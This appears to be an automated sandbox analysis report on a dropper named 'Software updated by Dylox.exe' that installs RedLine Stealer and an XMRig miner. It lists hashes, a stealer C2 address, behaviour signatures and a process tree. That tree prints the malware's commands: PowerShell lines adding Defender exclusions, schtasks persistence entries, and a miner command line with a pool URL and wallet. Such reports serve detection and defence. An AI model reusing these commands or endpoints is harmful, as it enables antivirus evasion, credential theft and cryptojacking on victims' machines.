Analysis
-
max time kernel
149s -
max time network
148s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
26-10-2021 15:36
Static task
static1
Behavioral task
behavioral1
Sample
Software updated by Dylox.exe
Resource
win7-en-20210920
General
-
Target
Software updated by Dylox.exe
-
Size
3.2MB
-
MD5
6f78118b606c3c7c9bad1a9e0671cda8
-
SHA1
00abbc6a45d7009d8e166794289b39d0bb709ba5
-
SHA256
7be5baa4d9a45af1e6f15fdf6600537ed78e1694f9daa37741b5e8c3e58d7005
-
SHA512
77d474c0a67754e7f71ee1c932cd4f21bcbd1f94472ffd9c21cbe2c6242f5fa07f5fede82255b9037cff87fbde614225105db3b6a55be560dfc10ac74149d916
Malware Config
Extracted
redline
Youtube
185.203.240.16:1249
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/3272-140-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/3272-141-0x0000000000418D32-mapping.dmp family_redline behavioral2/memory/3272-150-0x0000000005680000-0x0000000005C86000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
XMRig Miner Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/988-557-0x000000014030F3F8-mapping.dmp xmrig behavioral2/memory/988-566-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 8 IoCs
Processes:
Datafile32.exeDatafile64.exeServer32.exeServer32.exeservices32.exeservices64.exesihost32.exesihost64.exepid process 692 Datafile32.exe 3012 Datafile64.exe 2296 Server32.exe 3272 Server32.exe 316 services32.exe 596 services64.exe 3764 sihost32.exe 2280 sihost64.exe -
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Datafile64.exeservices64.exeSoftware updated by Dylox.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Datafile64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion services64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion services64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Software updated by Dylox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Software updated by Dylox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Datafile64.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral2/memory/3336-117-0x0000000000E50000-0x0000000000E51000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\Datafile64.exe themida C:\Users\Admin\AppData\Local\Temp\Datafile64.exe themida behavioral2/memory/3012-131-0x0000000000400000-0x0000000000EAE000-memory.dmp themida C:\Windows\System32\services64.exe themida C:\Windows\system32\services64.exe themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Software updated by Dylox.exeDatafile64.exeservices64.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Software updated by Dylox.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Datafile64.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA services64.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 4 IoCs
Processes:
conhost.execonhost.exedescription ioc process File created C:\Windows\system32\services64.exe conhost.exe File opened for modification C:\Windows\system32\services64.exe conhost.exe File created C:\Windows\system32\Microsoft\Libs\sihost64.exe conhost.exe File created C:\Windows\system32\Microsoft\Libs\WR64.sys conhost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
Software updated by Dylox.exeDatafile64.exeservices64.exepid process 3336 Software updated by Dylox.exe 3012 Datafile64.exe 596 services64.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
Server32.execonhost.exedescription pid process target process PID 2296 set thread context of 3272 2296 Server32.exe Server32.exe PID 3500 set thread context of 988 3500 conhost.exe nslookup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2968 schtasks.exe 3232 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
conhost.exepowershell.exeServer32.exepowershell.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exenslookup.exepid process 2216 conhost.exe 2028 powershell.exe 2028 powershell.exe 2028 powershell.exe 3272 Server32.exe 752 powershell.exe 752 powershell.exe 752 powershell.exe 876 conhost.exe 3456 powershell.exe 3456 powershell.exe 3456 powershell.exe 1164 powershell.exe 1164 powershell.exe 1164 powershell.exe 3128 conhost.exe 3128 conhost.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3768 powershell.exe 3768 powershell.exe 3768 powershell.exe 3500 conhost.exe 3500 conhost.exe 436 powershell.exe 436 powershell.exe 436 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe 988 nslookup.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Software updated by Dylox.execonhost.exepowershell.exeServer32.exepowershell.execonhost.exepowershell.exedescription pid process Token: SeDebugPrivilege 3336 Software updated by Dylox.exe Token: SeDebugPrivilege 2216 conhost.exe Token: SeDebugPrivilege 2028 powershell.exe Token: SeIncreaseQuotaPrivilege 2028 powershell.exe Token: SeSecurityPrivilege 2028 powershell.exe Token: SeTakeOwnershipPrivilege 2028 powershell.exe Token: SeLoadDriverPrivilege 2028 powershell.exe Token: SeSystemProfilePrivilege 2028 powershell.exe Token: SeSystemtimePrivilege 2028 powershell.exe Token: SeProfSingleProcessPrivilege 2028 powershell.exe Token: SeIncBasePriorityPrivilege 2028 powershell.exe Token: SeCreatePagefilePrivilege 2028 powershell.exe Token: SeBackupPrivilege 2028 powershell.exe Token: SeRestorePrivilege 2028 powershell.exe Token: SeShutdownPrivilege 2028 powershell.exe Token: SeDebugPrivilege 2028 powershell.exe Token: SeSystemEnvironmentPrivilege 2028 powershell.exe Token: SeRemoteShutdownPrivilege 2028 powershell.exe Token: SeUndockPrivilege 2028 powershell.exe Token: SeManageVolumePrivilege 2028 powershell.exe Token: 33 2028 powershell.exe Token: 34 2028 powershell.exe Token: 35 2028 powershell.exe Token: 36 2028 powershell.exe Token: SeDebugPrivilege 3272 Server32.exe Token: SeDebugPrivilege 752 powershell.exe Token: SeIncreaseQuotaPrivilege 752 powershell.exe Token: SeSecurityPrivilege 752 powershell.exe Token: SeTakeOwnershipPrivilege 752 powershell.exe Token: SeLoadDriverPrivilege 752 powershell.exe Token: SeSystemProfilePrivilege 752 powershell.exe Token: SeSystemtimePrivilege 752 powershell.exe Token: SeProfSingleProcessPrivilege 752 powershell.exe Token: SeIncBasePriorityPrivilege 752 powershell.exe Token: SeCreatePagefilePrivilege 752 powershell.exe Token: SeBackupPrivilege 752 powershell.exe Token: SeRestorePrivilege 752 powershell.exe Token: SeShutdownPrivilege 752 powershell.exe Token: SeDebugPrivilege 752 powershell.exe Token: SeSystemEnvironmentPrivilege 752 powershell.exe Token: SeRemoteShutdownPrivilege 752 powershell.exe Token: SeUndockPrivilege 752 powershell.exe Token: SeManageVolumePrivilege 752 powershell.exe Token: 33 752 powershell.exe Token: 34 752 powershell.exe Token: 35 752 powershell.exe Token: 36 752 powershell.exe Token: SeDebugPrivilege 876 conhost.exe Token: SeDebugPrivilege 3456 powershell.exe Token: SeIncreaseQuotaPrivilege 3456 powershell.exe Token: SeSecurityPrivilege 3456 powershell.exe Token: SeTakeOwnershipPrivilege 3456 powershell.exe Token: SeLoadDriverPrivilege 3456 powershell.exe Token: SeSystemProfilePrivilege 3456 powershell.exe Token: SeSystemtimePrivilege 3456 powershell.exe Token: SeProfSingleProcessPrivilege 3456 powershell.exe Token: SeIncBasePriorityPrivilege 3456 powershell.exe Token: SeCreatePagefilePrivilege 3456 powershell.exe Token: SeBackupPrivilege 3456 powershell.exe Token: SeRestorePrivilege 3456 powershell.exe Token: SeShutdownPrivilege 3456 powershell.exe Token: SeDebugPrivilege 3456 powershell.exe Token: SeSystemEnvironmentPrivilege 3456 powershell.exe Token: SeRemoteShutdownPrivilege 3456 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Software updated by Dylox.exeServer32.exeDatafile32.execonhost.execmd.execmd.exeDatafile64.execonhost.execmd.execmd.execmd.execmd.exeservices32.execonhost.execmd.exesihost32.exeservices64.exedescription pid process target process PID 3336 wrote to memory of 692 3336 Software updated by Dylox.exe Datafile32.exe PID 3336 wrote to memory of 692 3336 Software updated by Dylox.exe Datafile32.exe PID 3336 wrote to memory of 3012 3336 Software updated by Dylox.exe Datafile64.exe PID 3336 wrote to memory of 3012 3336 Software updated by Dylox.exe Datafile64.exe PID 3336 wrote to memory of 2296 3336 Software updated by Dylox.exe Server32.exe PID 3336 wrote to memory of 2296 3336 Software updated by Dylox.exe Server32.exe PID 3336 wrote to memory of 2296 3336 Software updated by Dylox.exe Server32.exe PID 2296 wrote to memory of 3272 2296 Server32.exe Server32.exe PID 2296 wrote to memory of 3272 2296 Server32.exe Server32.exe PID 2296 wrote to memory of 3272 2296 Server32.exe Server32.exe PID 2296 wrote to memory of 3272 2296 Server32.exe Server32.exe PID 2296 wrote to memory of 3272 2296 Server32.exe Server32.exe PID 2296 wrote to memory of 3272 2296 Server32.exe Server32.exe PID 2296 wrote to memory of 3272 2296 Server32.exe Server32.exe PID 2296 wrote to memory of 3272 2296 Server32.exe Server32.exe PID 692 wrote to memory of 2216 692 Datafile32.exe conhost.exe PID 692 wrote to memory of 2216 692 Datafile32.exe conhost.exe PID 692 wrote to memory of 2216 692 Datafile32.exe conhost.exe PID 2216 wrote to memory of 2332 2216 conhost.exe cmd.exe PID 2216 wrote to memory of 2332 2216 conhost.exe cmd.exe PID 2332 wrote to memory of 2028 2332 cmd.exe powershell.exe PID 2332 wrote to memory of 2028 2332 cmd.exe powershell.exe PID 2216 wrote to memory of 2956 2216 conhost.exe cmd.exe PID 2216 wrote to memory of 2956 2216 conhost.exe cmd.exe PID 2956 wrote to memory of 3232 2956 cmd.exe schtasks.exe PID 2956 wrote to memory of 3232 2956 cmd.exe schtasks.exe PID 2332 wrote to memory of 752 2332 cmd.exe powershell.exe PID 2332 wrote to memory of 752 2332 cmd.exe powershell.exe PID 3012 wrote to memory of 876 3012 Datafile64.exe conhost.exe PID 3012 wrote to memory of 876 3012 Datafile64.exe conhost.exe PID 3012 wrote to memory of 876 3012 Datafile64.exe conhost.exe PID 876 wrote to memory of 672 876 conhost.exe cmd.exe PID 876 wrote to memory of 672 876 conhost.exe cmd.exe PID 672 wrote to memory of 3456 672 cmd.exe powershell.exe PID 672 wrote to memory of 3456 672 cmd.exe powershell.exe PID 876 wrote to memory of 1172 876 conhost.exe cmd.exe PID 876 wrote to memory of 1172 876 conhost.exe cmd.exe PID 1172 wrote to memory of 2968 1172 cmd.exe schtasks.exe PID 1172 wrote to memory of 2968 1172 cmd.exe schtasks.exe PID 2216 wrote to memory of 1256 2216 conhost.exe cmd.exe PID 2216 wrote to memory of 1256 2216 conhost.exe cmd.exe PID 1256 wrote to memory of 316 1256 cmd.exe services32.exe PID 1256 wrote to memory of 316 1256 cmd.exe services32.exe PID 672 wrote to memory of 1164 672 cmd.exe powershell.exe PID 672 wrote to memory of 1164 672 cmd.exe powershell.exe PID 876 wrote to memory of 2008 876 conhost.exe cmd.exe PID 876 wrote to memory of 2008 876 conhost.exe cmd.exe PID 2008 wrote to memory of 596 2008 cmd.exe services64.exe PID 2008 wrote to memory of 596 2008 cmd.exe services64.exe PID 316 wrote to memory of 3128 316 services32.exe conhost.exe PID 316 wrote to memory of 3128 316 services32.exe conhost.exe PID 316 wrote to memory of 3128 316 services32.exe conhost.exe PID 3128 wrote to memory of 1324 3128 conhost.exe cmd.exe PID 3128 wrote to memory of 1324 3128 conhost.exe cmd.exe PID 1324 wrote to memory of 3908 1324 cmd.exe powershell.exe PID 1324 wrote to memory of 3908 1324 cmd.exe powershell.exe PID 3128 wrote to memory of 3764 3128 conhost.exe sihost32.exe PID 3128 wrote to memory of 3764 3128 conhost.exe sihost32.exe PID 1324 wrote to memory of 3768 1324 cmd.exe powershell.exe PID 1324 wrote to memory of 3768 1324 cmd.exe powershell.exe PID 3764 wrote to memory of 3756 3764 sihost32.exe conhost.exe PID 3764 wrote to memory of 3756 3764 sihost32.exe conhost.exe PID 3764 wrote to memory of 3756 3764 sihost32.exe conhost.exe PID 596 wrote to memory of 3500 596 services64.exe conhost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Software updated by Dylox.exe"C:\Users\Admin\AppData\Local\Temp\Software updated by Dylox.exe"1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\services32.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\services32.exeC:\Users\Admin\services32.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\services32.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "/sihost32"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services64.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\services64.exeC:\Windows\system32\services64.exe5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"6⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"8⤵
-
C:\Windows\System32\nslookup.exeC:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=50 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6NiP86mD8cW+f6jtmqjmEDLY00XM3Bo2fOksM1LJ6Dgf" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56GQTOYuXRCBeyb5NYlmdCuiwuvmEFRE3FUoytGa2xDRKVyTGVqBRZ3YvrseaWnYy0OhLuczKVxfo8Wo33kvDh26CIpmy6+bf50YCXxhpkDvay12RqWFwTrEWzJDjMOFSbV4qSudJZDKeejGmt2wAsK4zZ9lj0F0NMeagNs9oiluuddfhHuwfN3JDOsm7vnmpSFDvtwzZIXsZWyWN624JxJsSIqBQxfKrcCnHvRx/k2yLSlvxLvum+3cwztr7Zb0wO7EEWrafJMkNolCTGr1RQK9klv+u1q+LOMUOW+Y1mA+ZjeC+aSi9qmt59ZMlAX42foDzL1w8qyVjl6rfhEF/2bTP0YCyKockkTlSVngGY/1F1T5EOo9DhmrxyNy9y8mJqRKYUIcpgNI5Y4F/BBh3W0pw0+6w6pKB/o2s/ADQ0m7f1mIWwiXrj/GHg6M2kw4tg4mnBGVnha642JDqV8iaYphm4FpsNVwyEeLSXd18Mjr+kd9fvE08ohpB15bbg+6JPSeWISk8CHiep3TzEvyvZ+5XcHZVh1iXXZwlYO+wW5wxnobnzBzuj6f/BZ2txWK+7m4Cgd8mjMym7jJ/vKH1WIDSz05jpx4+wkdqzn3YIdvl2S8Luc4rG0CJXqJOdwbYOBrAey4VzJk8E8cY9tmMr5hpjLcfmu59CVDYVbbFFkb9usjHhXda167RDDOeCiLgdiepY0+9J4GWfDFBWRnvZEIn9njCW10s1hFXvQH+unnKdsaoBPNxSaPInK8O97Hj64jPqNG5qPd3DSjbVR1Cvuh9P29ZftnsNS50GnGtYvaNRBa6443D9MamN7WKSEjXwi5X466GHpLm7tClAm3T8zHW8BSKHq3yutkuduzGC2BYW5rxa17LYp4CzfKufpZJNPcoGIEVeut/xrvPPi+IYNCKrJPaDMN2ZJkpVGMqbuc5AF89xn8L6Lg1pYhaW8QjVZfQAkz7FVC8K667Gg6noLQpAyfd6lW36v4zbzg+fy82rNQmYSI3WMfiYNmvJM8DVc0772kBqEwUisr6ktdw4QlqXJe45Hvgu4yC2Rb6/ntnmOTLJz66c2h/wdUSvS18C67j6jsTvSh7k7avmCdG4sgS/BcyNsYOGIVjgNICoikSjNVrnFxCscaJerBnNPv197mrO4+rRF20+jzVnXKaNAmzbmoa4UjU13WSWasSDIT/HLOYsB6MqZ9V7F19H0MAEc0HL5dHX6oXKZkVMPa+PCA=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth7⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\Server32.exe"C:\Users\Admin\AppData\Local\Temp\Server32.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Server32.exeC:\Users\Admin\AppData\Local\Temp\Server32.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logMD5
84f2160705ac9a032c002f966498ef74
SHA1e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
SHA2567840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
SHA512f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Server32.exe.logMD5
41fbed686f5700fc29aaccf83e8ba7fd
SHA15271bc29538f11e42a3b600c8dc727186e912456
SHA256df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437
SHA512234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
a7e2a6dddb6e104575dc1f819e69e1a7
SHA1d411332131d28deaa2ff2c9052a2a5ed20edf66f
SHA256d6de92e2fdc11428640c5c01599365020b6375d0870e2d422b67d3095892ac6f
SHA512d5080c76cd7f6fc600041db15dfa46c5da8744c6479e36015d2615e630b446b696e592ebff8b33ebb1d4b34c505b38b40c17ca064f0287b40205f72e442def8b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
c880d2ef46e7d0523f249034e8cfd4fc
SHA10ccfde8b22ed3e51236b3e9d9d5ce1a38b12c42c
SHA2561f6437039eb1615b68ef3fdab98864c123dcbc570618686e57f581e4d1138692
SHA51206463023da4242f8f3b553ff780157b03b8de053a8753c9367b1fca6991c5fb1922f7a13cac18d4f8ffa2f91a869402107cb897996e5eb909d5b0d39d8cbaa8f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
c880d2ef46e7d0523f249034e8cfd4fc
SHA10ccfde8b22ed3e51236b3e9d9d5ce1a38b12c42c
SHA2561f6437039eb1615b68ef3fdab98864c123dcbc570618686e57f581e4d1138692
SHA51206463023da4242f8f3b553ff780157b03b8de053a8753c9367b1fca6991c5fb1922f7a13cac18d4f8ffa2f91a869402107cb897996e5eb909d5b0d39d8cbaa8f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
17c663f7da483f6593a7c9ed0518ec24
SHA1bfc9b3fd4b2ce0954d2f5baabd827515a6d5d4fc
SHA25657aca0169693dee0df928029f72e967c03ce4a650fb2d8aade640c72cb770936
SHA512124e5c600c8af367956a45ce1b310810a13a4496ba97b8dabed6880b71a55f16b4a2225a4d98ad0e44d43fed7c96bef23f16204d2a4779972ddbe9a20dc553a4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
120f9904f15b5f2f3ad5257b33724514
SHA1fad45220173217f694ce2040775802aca65c672b
SHA25626d067e7576ea7e80899f1d773276fbe50405089dea796e7f6ae1949bd77542b
SHA512d0993b96932eab32ff89f38fc4efd6c87edada6108ecf66fde0a953be4e60416789f854888b05c8c599d853e36f1e8616700c42dc49e6ce34f37943522a98e41
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
9fa16af233f7f75cfb96ab54fd977917
SHA109b914e75666bffc041e5b080a29fe598172ef62
SHA25647f57d4f35f025fdab318035b6d988ffef717e9f8f4231f8e60c739b24886af0
SHA512ffb84331e71241221812d14ba3db396f80e80abedd8018c08430a48276a9c23b172e48bc00302f7f0ec4af30c9f7c46dfa7554171c1164b029f0355262f94a92
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
4d4f5047898864721994f8fca61d95e2
SHA189307704905679921b835d2e8c7bc59c929b5cc3
SHA256adb54033fa11764c3a54eb7a617255d66c3d8ae9199d58cdebe3bedfb0ea315b
SHA5127e6a199b62cd9f9c011a7d59570a0c8d58351197e84359c27b17943027162d933af11dcf18fc60b5727a46f4bc08ce2a0955462ac4c99137dfeae6555dfdebe1
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exeMD5
55f246c4f670bddc2e1c6fab66fb9af8
